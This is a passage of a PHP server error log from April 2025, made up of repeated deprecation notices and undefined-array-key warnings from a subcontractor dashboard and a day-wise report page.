deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:38:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:38:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:39:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:39:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:41:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:41:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:42:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:42:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:45:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:47:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:47:43 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:50:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:50:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:51:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:51:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:52:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:52:58 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 08:53:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 08:53:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 10:14:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 10:44:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 13:11:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 22:26:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 22:40:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 23:44:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 01:29:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 01:36:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 02:30:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:21:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:25:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:25:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 03:25:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 03:26:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 03:27:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 03:27:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 03:59:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 03:59:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 04:11:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 04:11:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 04:25:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 06:15:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 06:33:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 07:10:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 07:42:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 07:44:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 08:04:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 08:05:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:05:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:07:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:07:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:09:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 08:09:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:09:22 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:09:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:09:32 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:11:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:11:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:13:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:13:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:20:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:20:49 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:24:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:24:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:25:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:25:01 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:27:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:27:53 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:28:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:28:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:32:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:32:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 08:38:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [08-Apr-2025 08:38:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [08-Apr-2025 10:51:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 11:00:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [08-Apr-2025 12:13:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 00:47:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 00:59:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 01:23:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:03:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:04:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 02:04:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 02:12:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 02:12:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 02:15:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 02:15:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 02:16:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:20:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 02:39:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:13:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:13:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 03:13:26 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 03:37:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:42:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:43:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 03:58:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 04:27:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 04:34:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 04:34:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 04:34:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 04:36:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 04:36:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:01:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:26:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:26:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:26:45 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:27:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:27:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:30:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:36:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:37:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:38:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:42:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:42:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:42:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:43:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:43:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 05:43:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 05:47:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 05:47:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:00:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:00:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:03:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:03:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:07:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:07:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:12:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:12:48 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:14:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:14:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:35:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 06:36:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:36:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:36:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:36:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:45:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:45:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:45:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 06:45:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:45:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:46:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:46:30 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:47:34 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:47:34 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:48:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:48:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:48:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 06:59:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 06:59:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:00:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:00:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:00:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 07:00:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 